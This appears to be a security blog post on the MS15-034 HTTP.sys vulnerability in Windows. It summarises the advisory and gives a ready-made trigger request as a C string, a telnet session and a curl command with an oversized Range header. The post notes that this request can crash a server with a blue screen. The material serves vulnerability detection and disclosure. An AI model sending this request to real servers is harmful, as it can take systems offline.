A remote code execution vulnerability exists in the HTTP protocol stack (HTTP.sys) that is caused when HTTP.sys improperly parses specially crafted HTTP requests. An attacker who successfully exploited this vulnerability could execute arbitrary code in the context of the System account.
To exploit this vulnerability, an attacker would have to send a specially crafted HTTP request to the affected system. The update addresses the vulnerability by modifying how the Windows HTTP stack handles requests.
Details are withheld for now, so it's a race: patch your systems before the attackers can reverse engineer the Windows patch.
Update: exploit code is emerging
The first snippets of exploit code for MS15-034 are starting to show up, to scan for the vulnerability of a system.
char request1 = "GET / HTTP/1.1\r\nHost: stuff\r\nRange: bytes=0-18446744073709551615\r\n\r\n";
This remote scan is using the
Range-header to trigger a buffer overflow and detect if the system is vulnerable or not.
$ telnet 10.0.1.1 80 GET / HTTP/1.1 Host: stuff Range: bytes=0-18446744073709551615
The following curl command would mimic the same request.
$ curl -v 10.0.1.1/ -H "Host: irrelevant" -H "Range: bytes=0-18446744073709551615"
The Range-attack looks similar to a Denial-of-Service (DoS) attack on Apache a few years back that caused 100% CPU usage (dutch (NL) blogpost with more details).
When sending such a request, it can trigger a blue screen on the Windows Server, effectively rendering it offline.
The CVE and Microsoft Bulleting mention Remote Code Execution possibilities as well. Since the exact details of the patch aren't clear yet, it's unknown how to trigger that particular part of the vulnerability.
As well you can check your sites rigth here : https://lab.xpaw.me/MS15-034/